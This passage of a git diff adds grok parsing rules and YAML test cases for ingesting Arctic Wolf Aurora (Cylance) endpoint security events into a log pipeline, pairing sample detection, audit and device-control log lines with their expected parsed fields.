%{regex("[^,]*")} + matchRules: 'parse_api_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{data:zone_names}, Event Id: (%{notSpace:event_id})?, + Severity: (%{notSpace:severity})?, Description: + %{PARSE_TILL_COMMA:description}, Instigating Process Name: + %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating Process + Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, Instigating + Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA2:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, API DLL: + %{PARSE_TILL_COMMA2:api_dll}, API Function: + %{PARSE_TILL_COMMA2:api_function}, API Parameters: + %{regex("[^$]*"):api_parameters}' + - type: pipeline + name: Processing Aurora Focus COM Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeComEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus COM Based Detection Events + enabled: true + source: additional_details + samples: + - 'Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: + 9e5ac116-a20c-4929-9087-10fd7fdcb105, Severity: High, Description: + Device - Application COM Event, Instigating Process Name: + GoogleUpdate.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, + Instigating Process ImageFileSha256: + 63854E78780866D2AE56A58958A1FDA017A71F54B71FE70CF5403958E961862A, + Event Timestamp: 2023-08-23T07:28:59.588Z, Event Received + Timestamp: 2023-08-23T07:29:01Z, Device Last Reported Users: + (Window Manager\DWM-1), Zone Ids: + (D215191148D64DEE826768B62D64B244), Detection Rule Id: + 15b11fa2-fc61-4aa3-aa04-082c488f8a86, Instigating Process Command + Line: "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" + /svc, Instigating Process File Path: c:\program files + (x86)\google\update\googleupdate.exe, COM Interface ID: + 2933bf81-7b36-11d2-b20e-00c04f983e60, COM Program: msxml, COM + Interface: IXMLDOMDocument, Device Id: + 744ac660-9704-4edb-a8d0-ae13a343f3bf' + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_com_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, COM Interface + ID: %{PARSE_TILL_COMMA2:com_interface_id}, COM Program: + %{PARSE_TILL_COMMA2:com_program}, COM Interface: + %{PARSE_TILL_COMMA2:com_interface}, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing of Aurora Focus HTTP Visibility Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeHttpEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus HTTP Visibility Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: + 41ea5ce4-6501-4c13-a7a2-80f9afec9eee, Severity: High, Description: + DEVICE - Trigger on ANY http sensor event, Instigating Process + Name: svchost.exe, Instigating Process Owner: NT + AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: + 2B105FB153B1BCD619B95028612B3A93C60B953EEF6837D3BB0099E4207AAF6B, + Event Timestamp: 2023-08-23T15:48:52.992Z, Event Received + Timestamp: 2023-08-23T15:48:57Z, Device Last Reported Users: + (RIMNET\\adminuser,Window Manager\\DWM-1,Window Manager\\DWM-2), + Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: + 9a82a2d3-e6b0-4177-9bac-80ba5b1ef982, Instigating Process Command + Line: C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc, + Instigating Process File Path: c:\\windows\\system32\\svchost.exe, + Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf, User Agent: + Microsoft-CryptoAPI/10.0, Request Domain: ocsp.digicert.com, + Request Path: + /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA9\ + 5QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D, Request + Method: GET, Request Port: 80, Request Version: HTTP/1.1, Request + Headers: 0, Request Length: 0, Response Status: 0, Response + Headers: 0, Response Length: 0" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_http_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Device Id: + (%{notSpace:device_id})?, User Agent: + %{PARSE_TILL_COMMA2:http.useragent}, Request Domain: + %{PARSE_TILL_COMMA2:dns.question.name}, Request Path: + %{PARSE_TILL_COMMA2:request_path}, Request Method: + (%{notSpace:request_method})?, Request Port: + (%{port:request_port})?, Request Version: + %{PARSE_TILL_COMMA2:request_version}, Request Headers: + %{PARSE_TILL_COMMA2:request_headers}, Request Length: + (%{integer:request_length})?, Response Status: + %{PARSE_TILL_COMMA2:response_status}, Response Headers: + %{PARSE_TILL_COMMA2:response_headers}, Response Length: + (%{integer:response_length})?' + - type: user-agent-parser + name: Parsing `http.useragent` + enabled: true + sources: + - http.useragent + target: http.useragent_details + encoded: false + combineVersionDetails: false + - type: pipeline + name: Processing Aurora Focus Detection Events + enabled: true + filter: + query: service:detection-events + processors: + - name: Lookup on `severity` to `status` + enabled: true + source: severity + target: status + lookupTable: |- + High,critical + Medium,warning + Low,info + Info,info + Informational,info + type: lookup-processor + - type: status-remapper + name: Define `status` as the official status of the log + enabled: true + sources: + - status + - type: string-builder-processor + name: Reset `additional_details` attribute + enabled: true + template: "%{resolve_to_empty_string}" + target: additional_details + replaceMissing: true diff --git a/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security_tests.yaml b/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security_tests.yaml new file mode 100644 index 0000000000000..356403b6ab514 --- /dev/null +++ b/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security_tests.yaml @@ -0,0 +1,680 @@ +id: "arctic-wolf-aurora-endpoint-security" +tests: + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: AppControl, Event Name: pechange, Device Name: Unknown (test1), IP Address: (10.0.0.0), Action: Deny, Action Type: PE File Change, File Path: c:/test/test1, SHA256: 7D2113B7046867BC643CD621D2CBA7365609675505BAA66585FC44747C0D1EF5, Zone Names: (Windows Zone (Default)), Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8a, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + result: + custom: + action: "Deny" + action_type: "PE File Change" + additional_details: "" + device_id: "0929f443-2a56-46b3-bcfe-fc598da81d8a" + device_name: "Unknown (test1)" + event_type: "AppControl" + evt: + name: "pechange" + file_path: "c:/test/test1" + ip_addresses: + - "10.0.0.0" + policy_name: "Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + sha256: "7D2113B7046867BC643CD621D2CBA7365609675505BAA66585FC44747C0D1EF5" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_names: "(Windows Zone (Default))" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: AppControl, Event Name: pechange, Device Name: Unknown (test1), IP Address: (10.0.0.0), Action: Deny, Action Type: PE File Change, File Path: c:/test/test1, SHA256: 7D2113B7046867BC643CD621D2CBA7365609675505BAA66585FC44747C0D1EF5, Zone Names: (Windows Zone (Default)), Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8a, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: AuditLog, Event Name: LoginSuccess, Message: Provider: CylancePROTECT, Source IP: 163.116.205.119, User: John Carter (john.carter@example.com)" + result: + custom: + additional_details: "" + event_type: "AuditLog" + evt: + name: "LoginSuccess" + message: "Provider: CylancePROTECT, Source IP: 163.116.205.119" + service: "desktop-events" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + user: "John Carter (john.carter@example.com)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: AuditLog, Event Name: LoginSuccess, Message: Provider: CylancePROTECT, Source IP: 163.116.205.119, User: John Carter (john.carter@example.com)" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Device, Event Name: Registration, Device Name: AssetTag-EID, Zone Names: (zone1,zone2), Device Id: b1f8e376-cee3-4319-a076-f587c51e68ac" + result: + custom: + additional_details: "" + device_id: "b1f8e376-cee3-4319-a076-f587c51e68ac" + device_name: "AssetTag-EID" + event_type: "Device" + evt: + name: "Registration" + service: "desktop-events" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_names: "(zone1,zone2)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Device, Event Name: Registration, Device Name: AssetTag-EID, Zone Names: (zone1,zone2), Device Id: b1f8e376-cee3-4319-a076-f587c51e68ac" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeComEvent, Event Name: OpticsCaeComEvent, Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: 9e5ac116-a20c-4929-9087-10fd7fdcb105, Severity: High, Description: Device - Application COM Event, Instigating Process Name: GoogleUpdate.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 63854E78780866D2AE56A58958A1FDA017A71F54B71FE70CF5403958E961862A, Event Timestamp: 2023-08-23T07:28:59.588Z, Event Received Timestamp: 2023-08-23T07:29:01Z, Device Last Reported Users: (Window Manager\\DWM-1), Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: 15b11fa2-fc61-4aa3-aa04-082c488f8a86, Instigating Process Command Line: \"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc, Instigating Process File Path: c:\\program files (x86)\\google\\update\\googleupdate.exe, COM Interface ID: 2933bf81-7b36-11d2-b20e-00c04f983e60, COM Program: msxml, COM Interface: IXMLDOMDocument, Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf" + result: + custom: + additional_details: "" + com_interface: "IXMLDOMDocument" + com_interface_id: "2933bf81-7b36-11d2-b20e-00c04f983e60" + com_program: "msxml" + description: "Device - Application COM Event" + detection_rule_id: "15b11fa2-fc61-4aa3-aa04-082c488f8a86" + device_id: "744ac660-9704-4edb-a8d0-ae13a343f3bf" + device_last_reported_users: + - "Window Manager\\DWM-1" + device_name: "DEVICE-W19" + event_id: "9e5ac116-a20c-4929-9087-10fd7fdcb105" + event_received_timestamp: "2023-08-23T07:29:01Z" + event_timestamp: "2023-08-23T07:28:59.588Z" + event_type: "OpticsCaeComEvent" + evt: + name: "OpticsCaeComEvent" + instigating_process_command_line: "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc" + instigating_process_file_path: "c:\\program files (x86)\\google\\update\\googleupdate.exe" + instigating_process_imagefilesha256: "63854E78780866D2AE56A58958A1FDA017A71F54B71FE70CF5403958E961862A" + instigating_process_name: "GoogleUpdate.exe" + instigating_process_owner: "NT AUTHORITY//SYSTEM" + service: "detection-events" + severity: "High" + status: "critical" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(D215191148D64DEE826768B62D64B244)" + zone_names: "(Zone_3.x)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeComEvent, Event Name: OpticsCaeComEvent, Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: 9e5ac116-a20c-4929-9087-10fd7fdcb105, Severity: High, Description: Device - Application COM Event, Instigating Process Name: GoogleUpdate.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 63854E78780866D2AE56A58958A1FDA017A71F54B71FE70CF5403958E961862A, Event Timestamp: 2023-08-23T07:28:59.588Z, Event Received Timestamp: 2023-08-23T07:29:01Z, Device Last Reported Users: (Window Manager\\DWM-1), Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: 15b11fa2-fc61-4aa3-aa04-082c488f8a86, Instigating Process Command Line: \"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc, Instigating Process File Path: c:\\program files (x86)\\google\\update\\googleupdate.exe, COM Interface ID: 2933bf81-7b36-11d2-b20e-00c04f983e60, COM Program: msxml, COM Interface: IXMLDOMDocument, Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf" + service: "detection-events" + status: "critical" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeHttpEvent, Event Name: OpticsCaeHttpEvent, Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: 41ea5ce4-6501-4c13-a7a2-80f9afec9eee, Severity: High, Description: DEVICE - Trigger on ANY http sensor event, Instigating Process Name: svchost.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 2B105FB153B1BCD619B95028612B3A93C60B953EEF6837D3BB0099E4207AAF6B, Event Timestamp: 2023-08-23T15:48:52.992Z, Event Received Timestamp: 2023-08-23T15:48:57Z, Device Last Reported Users: (RIMNET\\adminuser,Window Manager\\DWM-1,Window Manager\\DWM-2), Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: 9a82a2d3-e6b0-4177-9bac-80ba5b1ef982, Instigating Process Command Line: C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc, Instigating Process File Path: c:\\windows\\system32\\svchost.exe, Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf, User Agent: Microsoft-CryptoAPI/10.0, Request Domain: ocsp.digicert.com, Request Path: /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D, Request Method: GET, Request Port: 80, Request Version: HTTP/1.1, Request Headers: 0, Request Length: 0, Response Status: 0, Response Headers: 0, Response Length: 0" + result: + custom: + additional_details: "" + description: "DEVICE - Trigger on ANY http sensor event" + detection_rule_id: "9a82a2d3-e6b0-4177-9bac-80ba5b1ef982" + device_id: "744ac660-9704-4edb-a8d0-ae13a343f3bf" + device_last_reported_users: + - "RIMNET\\adminuser" + - "Window Manager\\DWM-1" + - "Window Manager\\DWM-2" + device_name: "DEVICE-W19" + dns: + question: + name: "ocsp.digicert.com" + event_id: "41ea5ce4-6501-4c13-a7a2-80f9afec9eee" + event_received_timestamp: "2023-08-23T15:48:57Z" + event_timestamp: "2023-08-23T15:48:52.992Z" + event_type: "OpticsCaeHttpEvent" + evt: + name: "OpticsCaeHttpEvent" + http: + useragent: "Microsoft-CryptoAPI/10.0" + useragent_details: + browser: + family: "Microsoft-CryptoAPI" + major: "10" + minor: "0" + device: + category: "Other" + family: "Other" + os: + family: "Other" + instigating_process_command_line: "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc" + instigating_process_file_path: "c:\\windows\\system32\\svchost.exe" + instigating_process_imagefilesha256: "2B105FB153B1BCD619B95028612B3A93C60B953EEF6837D3BB0099E4207AAF6B" + instigating_process_name: "svchost.exe" + instigating_process_owner: "NT AUTHORITY//SYSTEM" + request_headers: "0" + request_length: 0 + request_method: "GET" + request_path: "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D" + request_port: "80" + request_version: "HTTP/1.1" + response_headers: "0" + response_length: 0 + response_status: "0" + service: "detection-events" + severity: "High" + status: "critical" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(D215191148D64DEE826768B62D64B244)" + zone_names: "(Zone_3.x)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeHttpEvent, Event Name: OpticsCaeHttpEvent, Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: 41ea5ce4-6501-4c13-a7a2-80f9afec9eee, Severity: High, Description: DEVICE - Trigger on ANY http sensor event, Instigating Process Name: svchost.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 2B105FB153B1BCD619B95028612B3A93C60B953EEF6837D3BB0099E4207AAF6B, Event Timestamp: 2023-08-23T15:48:52.992Z, Event Received Timestamp: 2023-08-23T15:48:57Z, Device Last Reported Users: (RIMNET\\adminuser,Window Manager\\DWM-1,Window Manager\\DWM-2), Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: 9a82a2d3-e6b0-4177-9bac-80ba5b1ef982, Instigating Process Command Line: C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc, Instigating Process File Path: c:\\windows\\system32\\svchost.exe, Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf, User Agent: Microsoft-CryptoAPI/10.0, Request Domain: ocsp.digicert.com, Request Path: /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D, Request Method: GET, Request Port: 80, Request Version: HTTP/1.1, Request Headers: 0, Request Length: 0, Response Status: 0, Response Headers: 0, Response Length: 0" + service: "detection-events" + status: "critical" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeMemoryEvent, Event Name: OpticsCaeMemoryEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,Jeff_3.0), Event Id: c4e7d4e1-8739-4996-83a3-19d9ba583882, Severity: Medium, Description: Looking for a protect memory event, Instigating Process Name: AttackTest32.exe, Instigating Process Owner: PENTEST/Administrator, Instigating Process ImageFileSha256: 2762CB5818C67BDD28DFE88FB528EF06B0C1AB5C175E2206B49C85BB8672C2EC, Event Timestamp: 2022-07-21T12:55:02.277Z, Event Received Timestamp: 2022-07-21T12:55:25Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: edf530c6-6b0e-4be2-aeb6-d3f8001fce05, Instigating Process Command Line: AttackTest32.exe -p:8000, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\attacktest\\attacktest32.exe, Device Id: e378dacb-9324-453a-b8c6-5a8406952195" + result: + custom: + additional_details: "" + description: "Looking for a protect memory event" + detection_rule_id: "edf530c6-6b0e-4be2-aeb6-d3f8001fce05" + device_id: "e378dacb-9324-453a-b8c6-5a8406952195" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "c4e7d4e1-8739-4996-83a3-19d9ba583882" + event_received_timestamp: "2022-07-21T12:55:25Z" + event_timestamp: "2022-07-21T12:55:02.277Z" + event_type: "OpticsCaeMemoryEvent" + evt: + name: "OpticsCaeMemoryEvent" + instigating_process_command_line: "AttackTest32.exe -p:8000" + instigating_process_file_path: "c:\\users\\administrator.pentest\\downloads\\attacktest\\attacktest32.exe" + instigating_process_imagefilesha256: "2762CB5818C67BDD28DFE88FB528EF06B0C1AB5C175E2206B49C85BB8672C2EC" + instigating_process_name: "AttackTest32.exe" + instigating_process_owner: "PENTEST/Administrator" + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + zone_names: "(JeffTesting,Jeff_3.0)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeMemoryEvent, Event Name: OpticsCaeMemoryEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,Jeff_3.0), Event Id: c4e7d4e1-8739-4996-83a3-19d9ba583882, Severity: Medium, Description: Looking for a protect memory event, Instigating Process Name: AttackTest32.exe, Instigating Process Owner: PENTEST/Administrator, Instigating Process ImageFileSha256: 2762CB5818C67BDD28DFE88FB528EF06B0C1AB5C175E2206B49C85BB8672C2EC, Event Timestamp: 2022-07-21T12:55:02.277Z, Event Received Timestamp: 2022-07-21T12:55:25Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: edf530c6-6b0e-4be2-aeb6-d3f8001fce05, Instigating Process Command Line: AttackTest32.exe -p:8000, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\attacktest\\attacktest32.exe, Device Id: e378dacb-9324-453a-b8c6-5a8406952195" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Device, Event Name: Device Updated, Device Message: Renamed: 'default' to 'Unknown', User: John Carter (john.carter@example.com), Zone Names: (Windows Zone (Default)), Device Id: 4755134a-9eb4-44d1-95f3-aa605d4443cf" + result: + custom: + additional_details: "" + device_id: "4755134a-9eb4-44d1-95f3-aa605d4443cf" + device_name: "Unknown" + event_type: "Device" + evt: + name: "Device Updated" + previous_device: "default" + service: "desktop-events" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + user: "John Carter (john.carter@example.com)" + zone_names: "(Windows Zone (Default))" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Device, Event Name: Device Updated, Device Message: Renamed: 'default' to 'Unknown', User: John Carter (john.carter@example.com), Zone Names: (Windows Zone (Default)), Device Id: 4755134a-9eb4-44d1-95f3-aa605d4443cf" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: DeviceControl, Event Name: blocked, Device Name: Unknown CLW 381, External Device Type: USBDrive, External Device Vendor ID: 090S, External Device Name: USB Flash DISK USB Device, External Device Product ID: 1001, External Device Serial Number: 1408033910001649, Zone Names: (Windows Zone (Default)), Device Id: cf753b5b-6ce6-4648-b2df-a827d3560b6q, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + result: + custom: + additional_details: "" + device_id: "cf753b5b-6ce6-4648-b2df-a827d3560b6q" + device_name: "Unknown CLW 381" + event_type: "DeviceControl" + evt: + name: "blocked" + external_device_name: "USB Flash DISK USB Device" + external_device_product_id: "1001" + external_device_serial_number: "1408033910001649" + external_device_type: "USBDrive" + external_device_vendor_id: "090S" + policy_name: "Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_names: "(Windows Zone (Default))" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: DeviceControl, Event Name: blocked, Device Name: Unknown CLW 381, External Device Type: USBDrive, External Device Vendor ID: 090S, External Device Name: USB Flash DISK USB Device, External Device Product ID: 1001, External Device Serial Number: 1408033910001649, Zone Names: (Windows Zone (Default)), Device Id: cf753b5b-6ce6-4648-b2df-a827d3560b6q, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: ScriptControl, Event Name: Alert, Device Name: Unknown CLW 381, File Path: c:/test/test1, SHA256: DBEDAAF4FB3BFCB676F851C981351966E096DD25138AD07EC4D1A095A6485C5K, Status: Unscored, Interpreter: PowershellScript, Interpreter Version: 10.0.22621.1 (WinBuild.160101.080k), Zone Names: (Windows Zone (Default)), User Name: fakeuser, Device Id: cf753b5b-6ce6-4648-b2df-a827d3560b6k, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + result: + custom: + additional_details: "" + device_id: "cf753b5b-6ce6-4648-b2df-a827d3560b6k" + device_name: "Unknown CLW 381" + event_type: "ScriptControl" + evt: + name: "Alert" + file_path: "c:/test/test1" + interpreter: "PowershellScript" + interpreter_version: "10.0.22621.1 (WinBuild.160101.080k)" + policy_name: "Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + script_control_status: "Unscored" + service: "desktop-events" + sha256: "DBEDAAF4FB3BFCB676F851C981351966E096DD25138AD07EC4D1A095A6485C5K" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + user: "fakeuser" + zone_names: "(Windows Zone (Default))" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: ScriptControl, Event Name: Alert, Device Name: Unknown CLW 381, File Path: c:/test/test1, SHA256: DBEDAAF4FB3BFCB676F851C981351966E096DD25138AD07EC4D1A095A6485C5K, Status: Unscored, Interpreter: PowershellScript, Interpreter Version: 10.0.22621.1 (WinBuild.160101.080k), Zone Names: (Windows Zone (Default)), User Name: fakeuser, Device Id: cf753b5b-6ce6-4648-b2df-a827d3560b6k, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Threat, Event Name: threat_changed, Device Name: Unknown (test1), IP Address: (10.0.0.0), File Name: fakefile1, Path: c:/test/test1, Drive Type: Internal Hard Drive, SHA256: D946DEEEFF734644A86D7B254AD9D69F730E2014411404696DA19DBD508711C9, MD5: E719222BD4624F1C0A92117FE33E261a, Status: Quarantined, Cylance Score: 96, Found Date: 11/18/2025 8:40:23 AM, File Type: Executable, Is Running: False, Auto Run: False, Detected By: FileWatcher, Zone Names: 